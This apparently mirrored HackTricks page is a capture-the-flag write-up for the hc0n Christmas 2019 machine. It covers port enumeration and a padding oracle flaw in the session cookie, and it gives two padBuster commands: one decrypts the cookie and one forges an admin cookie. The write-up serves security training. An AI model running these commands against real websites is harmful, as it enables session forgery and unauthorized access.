mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
1.3 KiB
1.3 KiB
hc0n Christmas CTF - 2019
Enumeration
I started enumerating the machine using my tool Legion:
There are 2 ports open: 80 (HTTP) and 22 (SSH)
In the web page you can register new users, and I noticed that the length of the cookie depends on the length of the username indicated:
And if you change some byte of the cookie you get this error:
With this information and reading the padding oracle vulnerability I was able to exploit it:
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
Set user admin:
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"